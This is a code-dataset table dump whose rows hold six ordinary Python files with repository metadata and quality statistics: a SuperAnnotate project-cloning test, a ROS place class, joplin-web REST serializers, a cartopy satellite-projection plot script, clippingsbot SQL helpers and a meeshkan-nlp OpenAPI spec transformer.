hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8e65daebe577c08239034ca2c192e6c446ad91d9 | 5,865 | py | Python | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 26 | 2020-09-25T06:25:06.000Z | 2022-01-30T16:44:07.000Z | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 12 | 2020-12-21T19:59:48.000Z | 2022-01-21T10:32:07.000Z | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 11 | 2020-09-17T13:39:19.000Z | 2022-03-02T18:12:29.000Z | import os
from os.path import dirname
from unittest import TestCase
import pytest
import src.superannotate as sa
class TestCloneProject(TestCase):
PROJECT_NAME_1 = "test_create_like_project_1"
PROJECT_NAME_2 = "test_create_like_project_2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Vector"
IMAGE_QUALITY = "original"
PATH_TO_URLS = "data_set/attach_urls.csv"
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_create_like_project(self):
_, _, _ = sa.attach_image_urls_to_project(
self.PROJECT_NAME_1,
os.path.join(dirname(dirname(__file__)), self.PATH_TO_URLS),
)
sa.create_annotation_class(
self.PROJECT_NAME_1,
"rrr",
"#FFAAFF",
[
{
"name": "tall",
"is_multiselect": 0,
"attributes": [{"name": "yes"}, {"name": "no"}],
},
{
"name": "age",
"is_multiselect": 0,
"attributes": [{"name": "young"}, {"name": "old"}],
},
],
)
sa.set_project_default_image_quality_in_editor(self.PROJECT_NAME_1,self.IMAGE_QUALITY)
sa.set_project_workflow(
self.PROJECT_NAME_1,
[
{
"step": 1,
"className": "rrr",
"tool": 3,
"attribute": [
{
"attribute": {
"name": "young",
"attribute_group": {"name": "age"},
}
},
{
"attribute": {
"name": "yes",
"attribute_group": {"name": "tall"},
}
},
],
}
],
)
new_project = sa.clone_project(
self.PROJECT_NAME_2, self.PROJECT_NAME_1, copy_contributors=True
)
source_project = sa.get_project_metadata(self.PROJECT_NAME_1)
self.assertEqual(new_project['upload_state'], source_project['upload_state'])
new_settings = sa.get_project_settings(self.PROJECT_NAME_2)
image_quality = None
for setting in new_settings:
if setting["attribute"].lower() == "imagequality":
image_quality = setting["value"]
break
self.assertEqual(image_quality,self.IMAGE_QUALITY)
self.assertEqual(new_project["description"], self.PROJECT_DESCRIPTION)
self.assertEqual(new_project["type"].lower(), "vector")
ann_classes = sa.search_annotation_classes(self.PROJECT_NAME_2)
self.assertEqual(len(ann_classes), 1)
self.assertEqual(ann_classes[0]["name"], "rrr")
self.assertEqual(ann_classes[0]["color"], "#FFAAFF")
new_workflow = sa.get_project_workflow(self.PROJECT_NAME_2)
self.assertEqual(len(new_workflow), 1)
self.assertEqual(new_workflow[0]["className"], "rrr")
self.assertEqual(new_workflow[0]["tool"], 3)
self.assertEqual(len(new_workflow[0]["attribute"]), 2)
self.assertEqual(new_workflow[0]["attribute"][0]["attribute"]["name"], "young")
self.assertEqual(
new_workflow[0]["attribute"][0]["attribute"]["attribute_group"]["name"],
"age",
)
self.assertEqual(new_workflow[0]["attribute"][1]["attribute"]["name"], "yes")
self.assertEqual(
new_workflow[0]["attribute"][1]["attribute"]["attribute_group"]["name"],
"tall",
)
class TestCloneProjectAttachedUrls(TestCase):
PROJECT_NAME_1 = "TestCloneProjectAttachedUrls_1"
PROJECT_NAME_2 = "TestCloneProjectAttachedUrls_2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Document"
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_create_like_project(self):
sa.create_annotation_class(
self.PROJECT_NAME_1,
"rrr",
"#FFAAFF",
[
{
"name": "tall",
"is_multiselect": 0,
"attributes": [{"name": "yes"}, {"name": "no"}],
},
{
"name": "age",
"is_multiselect": 0,
"attributes": [{"name": "young"}, {"name": "old"}],
},
],
)
new_project = sa.clone_project(
self.PROJECT_NAME_2, self.PROJECT_NAME_1, copy_contributors=True
)
self.assertEqual(new_project["description"], self.PROJECT_DESCRIPTION)
self.assertEqual(new_project["type"].lower(), "document")
ann_classes = sa.search_annotation_classes(self.PROJECT_NAME_2)
self.assertEqual(len(ann_classes), 1)
self.assertEqual(ann_classes[0]["name"], "rrr")
self.assertEqual(ann_classes[0]["color"], "#FFAAFF")
self.assertIn("Workflow copy is deprecated for Document projects.",self._caplog.text)
| 35.762195 | 94 | 0.539301 | 574 | 5,865 | 5.207317 | 0.1777 | 0.103045 | 0.100368 | 0.064236 | 0.619605 | 0.552024 | 0.529274 | 0.517899 | 0.45634 | 0.45634 | 0 | 0.014392 | 0.336573 | 5,865 | 163 | 95 | 35.981595 | 0.753791 | 0 | 0 | 0.430556 | 0 | 0 | 0.139471 | 0.023188 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.048611 | false | 0 | 0.034722 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e68d491045b46e0d5c3609fa40d0f8cbf83aabf | 3,106 | py | Python | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | 3 | 2018-09-08T10:28:59.000Z | 2019-09-08T00:11:33.000Z | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | null | null | null | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | 2 | 2019-04-17T17:24:28.000Z | 2019-06-10T18:16:44.000Z | """Author: Brandon Trabucco.
Utility class for loading and managing locations in the robot's map.
"""
import json
import math
import rospy
from rt_msgs.msg import Odom
from std_msgs.msg import Header
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseStamped
from tf.transformations import euler_from_quaternion
from image_caption_machine.msg import WorldPlace
from image_caption_machine.convert.message import convert_ros_message_to_dictionary
from image_caption_machine.convert.message import convert_dictionary_to_ros_message
class Place(object):
"""Utility class for managing physycal naed locations.
"""
def __init__(self, name="default", pose_stamped=PoseStamped(
Header(0, rospy.Time(secs=0, nsecs=0), "None"),
Pose(Point(0.0, 0.0, 0.0),
Quaternion(0.0, 0.0, 0.0, 0.0))),
x=None, y=None,
json=None, msg=None):
"""Initialize the class with default parameters.
Args:
name: str REQUIRED
pose_stamped: PoseStamped REQUIRED
x: float
y: float
json: {name: "...", pose_stamped: {...}}
msg: WorldPlace message
"""
self.name = name
self.pose_stamped = pose_stamped
if x is not None:
self.pose_stamped.pose.position.x = x
if y is not None:
self.pose_stamped.pose.position.y = y
if json is not None:
self.json = json
if msg is not None:
self.msg = msg
@property
def json(self):
"""Serialize the place to json.
"""
return {"name": self.name, "pose_stamped":
convert_ros_message_to_dictionary(self.pose_stamped)}
@json.setter
def json(self, val):
"""Load json into the odom object.
"""
self.name = val["name"]
self.pose_stamped = convert_dictionary_to_ros_message(
"geometry_msgs/PoseStamped", val["pose_stamped"])
@property
def msg(self):
"""Utility to convert Place() to WorldPlace message.
"""
return WorldPlace(name=self.name, pose_stamped=self.pose_stamped)
@msg.setter
def msg(self, val):
"""Utility to convert WorldPlace message to Place().
"""
self.name = val.name
self.pose_stamped = val.pose_stamped
@property
def x(self):
"""Helper to get the x position.
"""
return self.pose_stamped.pose.position.x
@property
def y(self):
"""Helper to get the y position.
"""
return self.pose_stamped.pose.position.y
def to(self, other):
"""Helper to get the length to another place.
Args:
other: Place() object
"""
dx = self.x - other.x
dy = self.y - other.y
return math.sqrt((dx * dx) + (dy * dy))
def __str__(self):
"""Helper to convert the object to string.
"""
return self.name
| 24.650794 | 83 | 0.603348 | 397 | 3,106 | 4.579345 | 0.219144 | 0.10286 | 0.016502 | 0.017602 | 0.366337 | 0.182618 | 0.177118 | 0.094609 | 0 | 0 | 0 | 0.007805 | 0.298777 | 3,106 | 125 | 84 | 24.848 | 0.826905 | 0.245654 | 0 | 0.068966 | 0 | 0 | 0.03098 | 0.01139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0 | 0.224138 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e69d02ee0597be4c48dd1fc7fd8cd5d2f553e35 | 2,238 | py | Python | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | null | null | null | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | null | null | null | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | 1 | 2019-12-13T15:18:58.000Z | 2019-12-13T15:18:58.000Z | from rest_framework import serializers
from joplin_web.models import Folders, Notes, Tags, NoteTags, Version
class FoldersSerializer(serializers.ModelSerializer):
nb_notes = serializers.IntegerField(read_only=True)
class Meta:
fields = ('id', 'title', 'parent_id', 'nb_notes', 'created_time')
model = Folders
class NotesSerializer(serializers.ModelSerializer):
parent = FoldersSerializer(read_only=True)
parent_id = serializers.PrimaryKeyRelatedField(queryset=Folders.objects.using('joplin').all(),
source='folders',
write_only=True)
class Meta:
fields = ('id', 'parent_id', 'parent', 'title', 'body',
'is_todo', 'todo_due',
'created_time', 'updated_time',
'source', 'source_application',
'latitude', 'longitude', 'altitude',
'author')
model = Notes
class TagsSerializer(serializers.ModelSerializer):
nb_notes = serializers.IntegerField(read_only=True)
class Meta:
fields = '__all__'
model = Tags
class NoteTagsSerializer(serializers.ModelSerializer):
note = NotesSerializer(read_only=True)
tag = TagsSerializer(read_only=True)
note_id = serializers.PrimaryKeyRelatedField(
queryset=Notes.objects.using('joplin').all(), source='notes', write_only=True)
tag_id = serializers.PrimaryKeyRelatedField(
queryset=Tags.objects.using('joplin').all(), source='tags', write_only=True)
class Meta:
fields = ('id', 'note_id', 'note', 'tag_id', 'tag', 'created_time',
'updated_time', 'user_created_time', 'user_updated_time',
'encryption_cipher_text', 'encryption_applied')
model = NoteTags
class NoteTagsByNoteIdSerializer(serializers.ModelSerializer):
tag = TagsSerializer(read_only=True)
class Meta:
fields = ('tag',)
model = NoteTags
class VersionSerializer(serializers.ModelSerializer):
version = serializers.IntegerField()
class Meta:
fields = ('version', )
read_only_fields = ('version', )
model = Version
| 29.84 | 98 | 0.628239 | 209 | 2,238 | 6.526316 | 0.277512 | 0.052786 | 0.052786 | 0.062317 | 0.280059 | 0.18695 | 0.165689 | 0.121701 | 0.121701 | 0.121701 | 0 | 0 | 0.259607 | 2,238 | 74 | 99 | 30.243243 | 0.823174 | 0 | 0 | 0.25 | 0 | 0 | 0.14924 | 0.00983 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6ab08948cc89750d63dd9c07947a6c58786c2f | 5,859 | py | Python | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | 1 | 2021-05-09T02:54:10.000Z | 2021-05-09T02:54:10.000Z | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | null | null | null | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | null | null | null | """
NCL_sat_3.py
================
This script illustrates the following concepts:
- zooming into an orthographic projection
- plotting filled contour data on an orthographic map
- plotting lat/lon tick marks on an orthographic map
See following URLs to see the reproduced NCL plot & script:
- Original NCL script: https://www.ncl.ucar.edu/Applications/Scripts/sat_3.ncl
- Original NCL plot: https://www.ncl.ucar.edu/Applications/Images/sat_3_lg.png
"""
import cartopy.crs as ccrs
import cartopy.feature as cfeature
import geocat.datafiles as gdf
###############################################################################
# Import packages:
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import numpy as np
import xarray as xr
from geocat.viz import util as gvutil
###############################################################################
# Define a helper function for plotting lat/lon ticks on an orthographic plane
def plotOrthoTicks(coords, loc):
if loc == 'zero':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN}'.format(lon),
va='bottom',
ha='center',
transform=ccrs.PlateCarree())
if loc == 'left':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} N '.format(lat),
va='center',
ha='right',
transform=ccrs.PlateCarree())
if loc == 'right':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} N '.format(lat),
va='center',
ha='left',
transform=ccrs.PlateCarree())
if loc == 'top':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} W '.format(-lon),
va='bottom',
ha='center',
transform=ccrs.PlateCarree())
if loc == 'bottom':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} W '.format(-lon),
va='top',
ha='center',
transform=ccrs.PlateCarree())
###############################################################################
# Read in data:
# Open a netCDF data file using xarray default engine and
# load the data into xarrays
ds = xr.open_dataset(gdf.get('netcdf_files/h_avg_Y0191_D000.00.nc'),
decode_times=False)
# Extract a slice of the data
t = ds.T.isel(time=0, z_t=0)
###############################################################################
# Plot:
plt.figure(figsize=(8, 8))
# Create an axis with an orthographic projection
ax = plt.axes(projection=ccrs.Orthographic(central_longitude=-35,
central_latitude=60),
anchor='C')
# Set extent of map
ax.set_extent((-80, -10, 30, 80), crs=ccrs.PlateCarree())
# Add natural feature to map
ax.coastlines(resolution='110m')
ax.add_feature(cfeature.LAND, facecolor='lightgray', zorder=3)
ax.add_feature(cfeature.COASTLINE, linewidth=0.2, zorder=3)
ax.add_feature(cfeature.LAKES,
edgecolor='black',
linewidth=0.2,
facecolor='white',
zorder=4)
# plot filled contour data
heatmap = t.plot.contourf(ax=ax,
transform=ccrs.PlateCarree(),
levels=80,
vmin=-1.5,
vmax=28.5,
cmap='RdGy',
add_colorbar=False,
zorder=1)
# Add color bar
cbar_ticks = np.arange(-1.5, 31.5, 3)
cbar = plt.colorbar(heatmap,
orientation='horizontal',
extendfrac=[0, .1],
shrink=0.8,
aspect=14,
pad=0.05,
extendrect=True,
ticks=cbar_ticks)
cbar.ax.tick_params(labelsize=10)
# Get rid of black outline on colorbar
cbar.outline.set_visible(False)
# Set main plot title
main = r"$\bf{Example}$" + " " + r"$\bf{of}$" + " " + r"$\bf{Zooming}$" + \
" " + r"$\bf{a}$" + " " + r"$\bf{Sat}$" + " " + r"$\bf{Projection}$"
# Set plot subtitles using NetCDF metadata
left = t.long_name
right = t.units
# Use geocat-viz function to create main, left, and right plot titles
title = gvutil.set_titles_and_labels(ax,
maintitle=main,
maintitlefontsize=16,
lefttitle=left,
lefttitlefontsize=14,
righttitle=right,
righttitlefontsize=14,
xlabel="",
ylabel="")
# Plot gridlines
gl = ax.gridlines(color='black', linewidth=0.2, zorder=2)
# Set frequency of gridlines in the x and y directions
gl.xlocator = mticker.FixedLocator(np.arange(-180, 180, 15))
gl.ylocator = mticker.FixedLocator(np.arange(-90, 90, 15))
# Manually plot tick marks.
# NCL has automatic tick mark placement on orthographic projections,
# Python's cartopy module does not have this functionality yet.
plotOrthoTicks([(0, 81.7)], 'zero')
plotOrthoTicks([(-80, 30), (-76, 20), (-88, 40), (-107, 50)], 'left')
plotOrthoTicks([(-9, 30), (-6, 40), (1, 50), (13, 60)], 'right')
plotOrthoTicks([(-120, 60), (-60, 82.5)], 'top')
plotOrthoTicks([(-75, 16.0), (-60, 25.0), (-45, 29.0), (-30, 29.5),
(-15, 26.5)], 'bottom')
plt.tight_layout()
plt.show()
| 33.48 | 82 | 0.497013 | 656 | 5,859 | 4.396341 | 0.397866 | 0.020804 | 0.049931 | 0.019071 | 0.197642 | 0.166436 | 0.126907 | 0.126907 | 0.126907 | 0.126907 | 0 | 0.040806 | 0.330773 | 5,859 | 174 | 83 | 33.672414 | 0.694721 | 0.206861 | 0 | 0.287037 | 0 | 0 | 0.082501 | 0.008134 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009259 | false | 0 | 0.074074 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6c93847574069cca7db77ebf31e5ff0a8a00ef | 2,047 | py | Python | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | 1 | 2019-02-06T16:52:05.000Z | 2019-02-06T16:52:05.000Z | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | null | null | null | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | null | null | null | from bot import db
def save(data):
sql = """
insert into clippingsbot.teams (
team_id, access_token, user_id, team_name, scope
) values (
:team_id, :access_token, :user_id, :team_name, :scope
) on conflict (team_id) do update
set scope = excluded.scope,
access_token = excluded.access_token,
user_id = excluded.user_id,
team_name = excluded.team_name
returning team_id
"""
return db.scalar(sql, **data)
def find(team_id):
return db.find_one(
'select * from clippingsbot.teams where team_id = :team_id',
team_id = team_id)
def watch(team, channel_id, pattern, pattern_id):
sql = """
insert into clippingsbot.team_patterns (
team_id, channel_id, pattern_id, display_pattern
)
values (:team_id, :channel_id, :pattern_id, :pattern)
on conflict (team_id, channel_id, pattern_id) do nothing
"""
db.execute(
sql, team_id=team['team_id'], channel_id=channel_id,
pattern_id=pattern_id, pattern=pattern
)
def find_patterns(team, channel_id):
sql = """
select * from
clippingsbot.team_patterns
where team_id = :team_id and channel_id = :channel_id
"""
return db.find(sql, team_id=team['team_id'], channel_id=channel_id)
def count_other_channel_patterns(team, channel_id):
sql = """
select count(*)
from clippingsbot.team_patterns
where team_id = :team_id and channel_id != :channel_id
"""
return db.scalar(sql, team_id=team['team_id'], channel_id=channel_id)
def count_patterns(team):
sql = """
select count(*) from clippingsbot.team_patterns where team_id = :team_id
"""
return db.scalar(sql, team_id=team['team_id'])
def stop(team, channel_id, pattern):
sql = """
delete from clippingsbot.team_patterns
where team_id = :team_id and channel_id = :channel_id
and lower(display_pattern) = lower(:pattern)
"""
db.execute(sql, team_id=team['team_id'], channel_id=channel_id,
pattern=pattern)
| 28.041096 | 76 | 0.662921 | 283 | 2,047 | 4.5053 | 0.162544 | 0.141176 | 0.120784 | 0.065882 | 0.615686 | 0.611765 | 0.465882 | 0.465882 | 0.465882 | 0.409412 | 0 | 0 | 0.225696 | 2,047 | 72 | 77 | 28.430556 | 0.804416 | 0 | 0 | 0.241379 | 0 | 0 | 0.579873 | 0.085002 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12069 | false | 0 | 0.017241 | 0.017241 | 0.224138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6d24e204761284a5dd415da03add5895524b76 | 3,947 | py | Python | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | 1 | 2020-04-02T08:02:33.000Z | 2020-04-02T08:02:33.000Z | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | 9 | 2020-03-24T21:09:16.000Z | 2020-07-24T09:58:11.000Z | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | null | null | null | import typing
from operator import itemgetter
from http_types import HttpExchange
from jsonpath_rw import parse
from openapi_typed_2 import OpenAPIObject, convert_from_openapi, convert_to_openapi
from meeshkan.nlp.data_extractor import DataExtractor
from meeshkan.nlp.entity_extractor import EntityExtractor
from meeshkan.nlp.ids.id_classifier import IdClassifier, IdType
from meeshkan.nlp.operation_classifier import OperationClassifier
from meeshkan.nlp.spec_normalizer import SpecNormalizer
class SpecTransformer:
def __init__(
self,
extractor: EntityExtractor,
path_analyzer,
normalizer: SpecNormalizer,
id_classifier: IdClassifier,
):
self._extractor = extractor
self._path_analyzer = path_analyzer
self._normalizer = normalizer
self._operation_classifier = OperationClassifier()
self._id_classifier = id_classifier
self._data_extractor = DataExtractor()
def optimize_spec(
self, spec: OpenAPIObject, recordings: typing.List[HttpExchange]
) -> OpenAPIObject:
entity_paths = self._extractor.get_entity_from_spec(spec)
spec_dict = convert_from_openapi(spec)
datapaths, spec_dict = self._normalizer.normalize(spec_dict, entity_paths)
grouped_records = self._data_extractor.group_records(spec_dict, recordings)
spec_dict = self._replace_path_ids(spec_dict, grouped_records)
spec_dict = self._operation_classifier.fill_operations(spec_dict)
data = self._data_extractor.extract_data(datapaths, grouped_records)
spec_dict = self._add_entity_ids(spec_dict, data)
spec_dict = self._inject_data(spec_dict, data)
return convert_to_openapi(spec_dict)
def _replace_path_ids(self, spec, grouped_records):
for pathname, path_record in grouped_records.items():
for param in reversed(path_record.path_args):
res = self._id_classifier.by_values(path_record.path_arg_values[param])
if res != IdType.UNKNOWN:
path_item = spec["paths"].pop(pathname)
for param_desc in path_item["parameters"]:
if param_desc["name"] == param:
param_desc["name"] = "id"
param_desc["x-meeshkan-id-type"] = res.value
break
pathname = pathname.replace("{{{}}}".format(param), "{id}")
spec["paths"][pathname] = path_item
break
return spec
def _add_entity_ids(self, spec_dict, data):
for name, values in data.items():
schema = spec_dict["components"]["schemas"][name]
potential_ids = []
for property in schema["properties"]:
name_score = self._id_classifier.by_name(name, property)
if name_score > 0:
res = self._id_classifier.by_values(
(v[property] for v in values if property in v)
)
if res != IdType.UNKNOWN:
potential_ids.append((property, res, name_score))
if len(potential_ids) > 0:
idx = max(potential_ids, key=itemgetter(2))
schema["x-meeshkan-id-path"] = idx[0]
schema["x-meeshkan-id-type"] = idx[1].value
return spec_dict
def _inject_data(self, spec_dict, data):
spec_dict["x-meeshkan-data"] = {}
for name, values in data.items():
expr = parse(spec_dict["components"]["schemas"][name]["x-meeshkan-id-path"])
injected_values = dict()
for val in values:
idx = expr.find(val)
if len(idx) > 0:
injected_values[idx[0].value] = val
spec_dict["x-meeshkan-data"][name] = list(injected_values.values())
return spec_dict
